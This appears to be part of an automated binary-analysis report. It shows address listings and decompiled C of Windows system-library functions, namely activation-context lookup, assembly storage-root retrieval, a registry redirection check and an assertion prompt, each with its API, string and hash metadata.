                                                                                                                            0x6b1f30e0
                                                                                                                            0x6b1f30e0
                                                                                                                            0x6b1f30e5
                                                                                                                            0x6b1f2e7c
                                                                                                                            0x6b1f2e7e
                                                                                                                            0x6b23d784
                                                                                                                            0x6b23d789
                                                                                                                            0x6b23d789
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2e84
                                                                                                                            0x6b1f2e88
                                                                                                                            0x6b1f2e95
                                                                                                                            0x6b1f2e9c
                                                                                                                            0x6b1f2fcd
                                                                                                                            0x6b1f2fd4
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2fe3
                                                                                                                            0x6b1f2fe3
                                                                                                                            0x6b1f2fe7
                                                                                                                            0x6b1f2feb
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2feb
                                                                                                                            0x6b1f2ea2
                                                                                                                            0x6b1f2ea2
                                                                                                                            0x6b1f2ec2
                                                                                                                            0x6b1f2ec6
                                                                                                                            0x6b1f2ec8
                                                                                                                            0x6b1f2eca
                                                                                                                            0x6b1f2ecc
                                                                                                                            0x6b1f2ece
                                                                                                                            0x6b23d78b
                                                                                                                            0x6b23d78d
                                                                                                                            0x00000000
                                                                                                                            0x6b23d793
                                                                                                                            0x00000000
                                                                                                                            0x6b23d793
                                                                                                                            0x6b1f2ed4
                                                                                                                            0x6b1f2ed4
                                                                                                                            0x6b1f2ed4
                                                                                                                            0x6b1f2edb
                                                                                                                            0x6b23d803
                                                                                                                            0x6b23d803
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2ee1
                                                                                                                            0x6b1f2ee1
                                                                                                                            0x6b1f2ef0
                                                                                                                            0x6b1f2ef0
                                                                                                                            0x6b1f2ef0
                                                                                                                            0x6b1f2efa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f00
                                                                                                                            0x6b1f2f07
                                                                                                                            0x6b1f2f09
                                                                                                                            0x6b1f2f0e
                                                                                                                            0x6b1f2f0f
                                                                                                                            0x6b1f2f10
                                                                                                                            0x6b1f2f15
                                                                                                                            0x6b1f2f1c
                                                                                                                            0x6b1f30ee
                                                                                                                            0x6b1f30f7
                                                                                                                            0x6b1f30f9
                                                                                                                            0x6b1f30fc
                                                                                                                            0x6b1f3102
                                                                                                                            0x6b1f319d
                                                                                                                            0x6b1f31b0
                                                                                                                            0x6b1f31b6
                                                                                                                            0x6b1f31ba
                                                                                                                            0x6b1f31c3
                                                                                                                            0x6b1f31c9
                                                                                                                            0x6b1f31c9
                                                                                                                            0x6b1f31c3
                                                                                                                            0x6b1f3102
                                                                                                                            0x6b1f311a
                                                                                                                            0x6b1f3140
                                                                                                                            0x6b1f3146
                                                                                                                            0x6b1f3147
                                                                                                                            0x6b1f3148
                                                                                                                            0x6b1f3153
                                                                                                                            0x6b1f311c
                                                                                                                            0x6b1f311c
                                                                                                                            0x6b1f3120
                                                                                                                            0x6b1f313a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f313a
                                                                                                                            0x6b1f2f22
                                                                                                                            0x6b1f2f27
                                                                                                                            0x6b1f2f83
                                                                                                                            0x6b1f2f83
                                                                                                                            0x6b1f2f84
                                                                                                                            0x6b1f2f85
                                                                                                                            0x6b1f2f94
                                                                                                                            0x6b1f2f29
                                                                                                                            0x6b1f2f29
                                                                                                                            0x6b1f2f32
                                                                                                                            0x6b1f2f34
                                                                                                                            0x6b1f2f3a
                                                                                                                            0x6b1f2f3e
                                                                                                                            0x6b1f2f45
                                                                                                                            0x6b1f2f49
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f50
                                                                                                                            0x6b1f2f53
                                                                                                                            0x6b1f2ff5
                                                                                                                            0x6b1f2ff7
                                                                                                                            0x6b23d798
                                                                                                                            0x6b23d7a0
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7a6
                                                                                                                            0x6b23d7a6
                                                                                                                            0x6b23d7aa
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7b0
                                                                                                                            0x6b23d7b0
                                                                                                                            0x6b23d7b3
                                                                                                                            0x6b23d7b9
                                                                                                                            0x6b23d7e3
                                                                                                                            0x6b23d7e5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7bb
                                                                                                                            0x6b23d7be
                                                                                                                            0x6b23d7cf
                                                                                                                            0x6b23d7dc
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7d1
                                                                                                                            0x6b23d7d1
                                                                                                                            0x6b23d7d6
                                                                                                                            0x6b23d7eb
                                                                                                                            0x6b23d7eb
                                                                                                                            0x6b23d7f0
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7f0
                                                                                                                            0x6b23d7c0
                                                                                                                            0x6b23d7c4
                                                                                                                            0x6b23d7df
                                                                                                                            0x6b23d7df
                                                                                                                            0x00000000
                                                                                                                            0x6b23d7df
                                                                                                                            0x6b23d7be
                                                                                                                            0x6b23d7b9
                                                                                                                            0x6b23d7aa
                                                                                                                            0x6b1f2ffd
                                                                                                                            0x6b1f2ffd
                                                                                                                            0x6b1f3000
                                                                                                                            0x6b1f3156
                                                                                                                            0x6b1f3158
                                                                                                                            0x6b1f3160
                                                                                                                            0x6b1f3166
                                                                                                                            0x6b1f316c
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3172
                                                                                                                            0x6b1f3172
                                                                                                                            0x6b1f3177
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3177
                                                                                                                            0x6b1f3006
                                                                                                                            0x6b1f3009
                                                                                                                            0x00000000
                                                                                                                            0x6b1f300f
                                                                                                                            0x6b1f300f
                                                                                                                            0x6b1f3013
                                                                                                                            0x6b1f301b
                                                                                                                            0x6b1f3021
                                                                                                                            0x6b1f3027
                                                                                                                            0x00000000
                                                                                                                            0x6b1f302d
                                                                                                                            0x6b1f302d
                                                                                                                            0x6b1f3032
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3032
                                                                                                                            0x6b1f3027
                                                                                                                            0x6b1f3009
                                                                                                                            0x6b1f3000
                                                                                                                            0x6b1f2f59
                                                                                                                            0x6b1f2f59
                                                                                                                            0x6b1f2f5c
                                                                                                                            0x6b23d7f9
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f62
                                                                                                                            0x6b1f2f62
                                                                                                                            0x6b1f2f64
                                                                                                                            0x6b1f303b
                                                                                                                            0x6b1f304d
                                                                                                                            0x6b1f3054
                                                                                                                            0x6b1f3185
                                                                                                                            0x6b1f31df
                                                                                                                            0x00000000
                                                                                                                            0x6b1f318c
                                                                                                                            0x6b1f318c
                                                                                                                            0x6b1f3190
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3190
                                                                                                                            0x6b1f305a
                                                                                                                            0x6b1f305a
                                                                                                                            0x6b1f307a
                                                                                                                            0x6b1f307e
                                                                                                                            0x6b1f3080
                                                                                                                            0x6b1f3082
                                                                                                                            0x6b1f3084
                                                                                                                            0x6b1f3086
                                                                                                                            0x00000000
                                                                                                                            0x6b1f308c
                                                                                                                            0x6b1f308d
                                                                                                                            0x6b1f3092
                                                                                                                            0x00000000
                                                                                                                            0x6b1f3092
                                                                                                                            0x6b1f3086
                                                                                                                            0x6b1f2f6a
                                                                                                                            0x6b1f2f6a
                                                                                                                            0x6b1f2f6f
                                                                                                                            0x6b1f2f71
                                                                                                                            0x6b1f3094
                                                                                                                            0x6b1f3094
                                                                                                                            0x6b1f309b
                                                                                                                            0x00000000
                                                                                                                            0x6b1f30a1
                                                                                                                            0x00000000
                                                                                                                            0x6b1f30a1
                                                                                                                            0x6b1f2f77
                                                                                                                            0x6b1f2f77
                                                                                                                            0x6b1f2f7c
                                                                                                                            0x6b1f2f7e
                                                                                                                            0x6b1f2f7e
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f7c
                                                                                                                            0x6b1f2f71
                                                                                                                            0x6b1f2f64
                                                                                                                            0x6b1f2f5c
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f53
                                                                                                                            0x6b1f2f50
                                                                                                                            0x6b1f2f27
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f1c
                                                                                                                            0x6b23d807
                                                                                                                            0x6b23d807
                                                                                                                            0x6b23d812
                                                                                                                            0x6b23d817
                                                                                                                            0x6b23d81a
                                                                                                                            0x00000000
                                                                                                                            0x6b23d81a
                                                                                                                            0x6b1f2edb
                                                                                                                            0x6b1f2ece
                                                                                                                            0x6b1f2e9c
                                                                                                                            0x6b1f30d5
                                                                                                                            0x6b1f30d5
                                                                                                                            0x00000000
                                                                                                                            0x6b1f30d5
                                                                                                                            0x6b1f30cf
                                                                                                                            0x6b1f30c6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2e59
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f97
                                                                                                                            0x6b1f2f97
                                                                                                                            0x6b1f2f9a
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2fa0
                                                                                                                            0x6b1f2fa3
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2fa3
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2f9a
                                                                                                                            0x6b1f2e40
                                                                                                                            0x6b1f2dd3
                                                                                                                            0x6b1f2ddc
                                                                                                                            0x6b23d71a
                                                                                                                            0x6b23d71f
                                                                                                                            0x6b23d724
                                                                                                                            0x6b23d729
                                                                                                                            0x6b23d729
                                                                                                                            0x6b23d72b
                                                                                                                            0x6b23d72d
                                                                                                                            0x6b23d732
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2de2
                                                                                                                            0x6b1f2de2
                                                                                                                            0x00000000
                                                                                                                            0x6b1f2de2
                                                                                                                            0x6b1f2ddc
                                                                                                                            0x6b1f2dd1
                                                                                                                            0x6b1f2dc8
                                                                                                                            0x6b1f2dbf
                                                                                                                            0x6b1f2db7
                                                                                                                            0x6b1f2dab
                                                                                                                            0x6b1f2d9c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.,RtlpFindActivationContextSection_CheckParameters,C000000D), ref: 6B23D72D
                                                                                                                            Strings
                                                                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 6B23D809
                                                                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 6B23D758
                                                                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 6B23D71F, 6B23D753
                                                                                                                            • Actx , xrefs: 6B23D76A, 6B23D7D1
                                                                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 6B23D724
                                                                                                                            • SsHd, xrefs: 6B1F2EF4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                            • API String ID: 3558298466-1988757188
                                                                                                                            • Opcode ID: 2eec4f3065c99f677d8878edd0cbe8955135f6c9ee2e45386da250193da85633
                                                                                                                            • Instruction ID: 6b16f1863c4f8d38c097aee4180e3acbdc04bd1b9bec90d1bd028f8bdf9fd845
                                                                                                                            • Opcode Fuzzy Hash: 2eec4f3065c99f677d8878edd0cbe8955135f6c9ee2e45386da250193da85633
                                                                                                                            • Instruction Fuzzy Hash: E4E100B0648346AFD714CF28C890B5AB7E9AB89754F10066EF865CB290D73CD946CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B20C63D, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E6B20C63D(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				void _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				intOrPtr _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x6b1b127c) {
					E6B265720(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E6B20CCC0);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E6B265720(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E6B20C707(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E6B265720(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E6B20C9BF(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E6B265720();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}














                                                                                                                            0x6b20c63d
                                                                                                                            0x6b20c63d
                                                                                                                            0x6b20c645
                                                                                                                            0x6b20c64f
                                                                                                                            0x6b20c652
                                                                                                                            0x6b20c655
                                                                                                                            0x6b20c65f
                                                                                                                            0x6b24a775
                                                                                                                            0x00000000
                                                                                                                            0x6b20c665
                                                                                                                            0x6b20c665
                                                                                                                            0x6b20c66a
                                                                                                                            0x6b20c66c
                                                                                                                            0x6b20c66c
                                                                                                                            0x6b20c66e
                                                                                                                            0x6b20c677
                                                                                                                            0x6b24a7ba
                                                                                                                            0x6b24a7bf
                                                                                                                            0x6b24a7c0
                                                                                                                            0x6b24a7c1
                                                                                                                            0x6b24a7cf
                                                                                                                            0x00000000
                                                                                                                            0x6b20c68e
                                                                                                                            0x6b20c6a5
                                                                                                                            0x6b20c6a9
                                                                                                                            0x6b24a77f
                                                                                                                            0x6b24a780
                                                                                                                            0x00000000
                                                                                                                            0x6b20c6af
                                                                                                                            0x6b20c6af
                                                                                                                            0x6b20c6b4
                                                                                                                            0x6b20c6f3
                                                                                                                            0x6b20c6f3
                                                                                                                            0x6b20c6b6
                                                                                                                            0x6b20c6b6
                                                                                                                            0x6b20c6bb
                                                                                                                            0x6b20c700
                                                                                                                            0x6b20c700
                                                                                                                            0x6b20c6bd
                                                                                                                            0x6b20c6bd
                                                                                                                            0x6b20c6c2
                                                                                                                            0x00000000
                                                                                                                            0x6b20c6c4
                                                                                                                            0x6b20c6c7
                                                                                                                            0x6b24a79e
                                                                                                                            0x6b24a7a1
                                                                                                                            0x6b24a7b0
                                                                                                                            0x6b24a7d7
                                                                                                                            0x6b24a7d7
                                                                                                                            0x6b20c6cd
                                                                                                                            0x6b20c6d7
                                                                                                                            0x6b20c6db
                                                                                                                            0x6b24a787
                                                                                                                            0x6b24a788
                                                                                                                            0x6b24a78d
                                                                                                                            0x6b24a78d
                                                                                                                            0x6b24a78f
                                                                                                                            0x6b24a791
                                                                                                                            0x6b20c6e1
                                                                                                                            0x6b20c6e7
                                                                                                                            0x6b20c6ec
                                                                                                                            0x00000000
                                                                                                                            0x6b20c6ee
                                                                                                                            0x6b20c6f1
                                                                                                                            0x00000000
                                                                                                                            0x6b20c6f1
                                                                                                                            0x6b20c6ec
                                                                                                                            0x6b20c6db
                                                                                                                            0x6b20c6c7
                                                                                                                            0x6b20c6c2
                                                                                                                            0x6b20c6bb
                                                                                                                            0x6b20c6b4
                                                                                                                            0x6b20c6a9
                                                                                                                            0x6b20c677
                                                                                                                            0x6b20c6fd

                                                                                                                            APIs
                                                                                                                            • DbgPrintEx.1105(00000033,00000000,SXS: %s() passed the empty activation context,RtlGetAssemblyStorageRoot,?,00000000,?,00000002,?,00000040,?,00000000,?), ref: 6B24A775
                                                                                                                            Strings
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 6B24A7C7
                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 6B24A768, 6B24A7A2, 6B24A7C2
                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 6B24A7A7
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 6B24A788
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 6B24A76D
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 6B24A780
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Print
                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                            • API String ID: 3558298466-861424205
                                                                                                                            • Opcode ID: 75b5f86ad8f01d2d0e523120a99f16fb58c0b2472a8f1dba6d5a9664c7b0aa38
                                                                                                                            • Instruction ID: b8d8ca392ad11c585be6ae64d7ff2b436082e3c3a8ccbcf839e0614531f3f871
                                                                                                                            • Opcode Fuzzy Hash: 75b5f86ad8f01d2d0e523120a99f16fb58c0b2472a8f1dba6d5a9664c7b0aa38
                                                                                                                            • Instruction Fuzzy Hash: 4231C1B2A0012DBBE7258A95CCC5F5F7AE99B56B55F0141A9F90077680DB2C9A0087F2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B2AF019, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 105memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 38%
                                                                                                                            			E6B2AF019(intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v32;
				void* _v40;
				void* _v48;
				void* _t39;
				intOrPtr _t55;
				long _t56;
				intOrPtr* _t63;
				intOrPtr _t64;
				void* _t65;

				_v12 = _v12 & 0x00000000;
				_t55 = __edx;
				_t64 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				RtlInitUnicodeString( &_v40, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\CommonGlobUserSettings\\");
				_t63 = _a8;
				_t56 = E6B2AF13B(_t64, _t55,  &_v40, _t63,  &_v12);
				if(_t56 >= 0 && _v12 == 2) {
					_t56 = 0;
					_v16 = 0;
					_v8 = 0;
					RtlInitUnicodeString( &_v32, L"RedirectedKey");
					_t39 =  *0x6b1b6cc8( *_t63,  &_v32, 2, 0, 0,  &_v8);
					if(_v8 > 0 && (_t39 == 0xc0000023 || _t39 == 0x80000005)) {
						_t65 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _v8);
						if(_t65 != 0) {
							_push( &_v8);
							_push(_v8);
							_push(_t65);
							_push(2);
							_push( &_v32);
							_push( *_t63);
							if( *0x6b1b6cc8() >= 0 &&  *((intOrPtr*)(_t65 + 4)) == 1) {
								_t22 = _t65 + 0xc; // 0xc
								RtlInitUnicodeString( &_v48, _t22);
								if(E6B2AF13B(_v24, _v20,  &_v48,  &_v16,  &_v12) >= 0) {
									 *0x6b1b6cc4( *_t63);
									 *_t63 = _v16;
								}
							}
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t65);
						}
					}
				}
				return _t56;
			}

















                                                                                                                            0x6b2af021
                                                                                                                            0x6b2af030
                                                                                                                            0x6b2af032
                                                                                                                            0x6b2af035
                                                                                                                            0x6b2af038
                                                                                                                            0x6b2af03b
                                                                                                                            0x6b2af041
                                                                                                                            0x6b2af056
                                                                                                                            0x6b2af05a
                                                                                                                            0x6b2af072
                                                                                                                            0x6b2af075
                                                                                                                            0x6b2af078
                                                                                                                            0x6b2af07b
                                                                                                                            0x6b2af08f
                                                                                                                            0x6b2af098
                                                                                                                            0x6b2af0c3
                                                                                                                            0x6b2af0c7
                                                                                                                            0x6b2af0cc
                                                                                                                            0x6b2af0cd
                                                                                                                            0x6b2af0d3
                                                                                                                            0x6b2af0d4
                                                                                                                            0x6b2af0d6
                                                                                                                            0x6b2af0d7
                                                                                                                            0x6b2af0e1
                                                                                                                            0x6b2af0e9
                                                                                                                            0x6b2af0f1
                                                                                                                            0x6b2af110
                                                                                                                            0x6b2af114
                                                                                                                            0x6b2af11d
                                                                                                                            0x6b2af11d
                                                                                                                            0x6b2af110
                                                                                                                            0x6b2af12b
                                                                                                                            0x6b2af12b
                                                                                                                            0x6b2af0c7
                                                                                                                            0x6b2af098
                                                                                                                            0x6b2af138

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeString.1105(?,\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\,02000000,?,00000000), ref: 6B2AF03B
                                                                                                                              • Part of subcall function 6B2AF13B: ZwOpenKey.1105(?,02000000,?,?,02000000,00000000), ref: 6B2AF182
                                                                                                                              • Part of subcall function 6B2AF13B: ZwCreateKey.1105(?,02000000,00000018,00000000,00000000,00000000,6B2AF056), ref: 6B2AF19F
                                                                                                                            • RtlInitUnicodeString.1105(?,RedirectedKey,?,?,00000000), ref: 6B2AF07B
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,00000000,00000000,?), ref: 6B2AF08F
                                                                                                                            • RtlAllocateHeap.1105(?,00000008,?), ref: 6B2AF0BE
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,00000000,?,?,?), ref: 6B2AF0D9
                                                                                                                            • RtlInitUnicodeString.1105(?,0000000C), ref: 6B2AF0F1
                                                                                                                            • ZwClose.1105(?,?,?,00000002), ref: 6B2AF114
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000), ref: 6B2AF12B
                                                                                                                            Strings
                                                                                                                            • RedirectedKey, xrefs: 6B2AF06A
                                                                                                                            • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 6B2AF02B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: InitStringUnicode$HeapQueryValue$AllocateCloseCreateFreeOpen
                                                                                                                            • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                            • API String ID: 1683559675-1388552009
                                                                                                                            • Opcode ID: 0a930fbfef44c600dfdf58fc467dac6799c3e0bc629cb0227efbe2f8a31582de
                                                                                                                            • Instruction ID: 08b18fd7506f0f17f4dd4843db289151ad1681f17ffde514815eb5f2a8a35594
                                                                                                                            • Opcode Fuzzy Hash: 0a930fbfef44c600dfdf58fc467dac6799c3e0bc629cb0227efbe2f8a31582de
                                                                                                                            • Instruction Fuzzy Hash: 5431D875A0111EBFEB51CFA8C985E9FBBFCEB18315F1041A6E505E2250DB389A45CBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B275100, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 85nativethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E6B275100(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v732;
				char _v736;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t17;
				char _t23;
				void* _t24;
				void* _t26;
				void* _t29;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				signed int _t37;
				void* _t38;
				void* _t43;
				void* _t44;

				_v8 =  *0x6b2cd360 ^ _t37;
				_t30 = _a8;
				_t36 = _a16;
				_t35 = _a4;
				_push( &_v732);
				E6B22DDD0( &_v732, __ecx, _t34, _t35, _t36);
				while(1) {
					_t17 = _t36;
					if(_t36 == 0) {
						_t17 = 0x6b1b48a4;
					}
					_push(_a12);
					_push(_t30);
					_push(_t35);
					E6B265720(0x65, 0, "\n*** Assertion failed: %s%s\n***   Source File: %s, line %ld\n\n", _t17);
					_t38 = _t38 + 0x1c;
					if(E6B288D47() == 0) {
						break;
					}
					if(E6B265780("Break repeatedly, break Once, Ignore, terminate Process, or terminate Thread (boipt)? ",  &_v736, 2) == 0) {
						asm("int3");
						L19:
						_push(0xc0000001);
						_push(0xffffffff);
						_t19 = E6B2197C0();
						break;
					}
					_t23 = _v736;
					_t43 = _t23 - 0x62;
					if(_t43 > 0) {
						_t19 = _t23 - 0x69;
						L10:
						if(_t44 == 0) {
							break;
						}
						_t24 = _t19 - 6;
						if(_t24 == 0) {
							L15:
							_t19 = E6B265720(0x65, 0, "Execute \'.cxr %p\' to dump context\n",  &_v732);
							_t38 = _t38 + 0x10;
							asm("int3");
							if(_v736 == 0x6f) {
								break;
							}
							if(_v736 != 0x4f) {
								continue;
							}
							break;
						}
						_t26 = _t24 - 1;
						if(_t26 == 0) {
							goto L19;
						}
						if(_t26 == 4) {
							_push(0xc0000001);
							_push(0xfffffffe);
							E6B219A30();
						}
						continue;
					}
					if(_t43 == 0) {
						goto L15;
					}
					_t29 = _t23 - 0x42;
					_t44 = _t29;
					if(_t44 == 0) {
						goto L15;
					}
					_t19 = _t29 - 7;
					goto L10;
				}
				return E6B21B640(_t19, _t30, _v8 ^ _t37, _t34, _t35, _t36);
			}























                                                                                                                            0x6b275112
                                                                                                                            0x6b275116
                                                                                                                            0x6b275120
                                                                                                                            0x6b275124
                                                                                                                            0x6b275127
                                                                                                                            0x6b275128
                                                                                                                            0x6b27512d
                                                                                                                            0x6b27512d
                                                                                                                            0x6b275131
                                                                                                                            0x6b275133
                                                                                                                            0x6b275133
                                                                                                                            0x6b275138
                                                                                                                            0x6b27513b
                                                                                                                            0x6b27513c
                                                                                                                            0x6b275147
                                                                                                                            0x6b27514c
                                                                                                                            0x6b275156
                                                                                                                            0x00000000
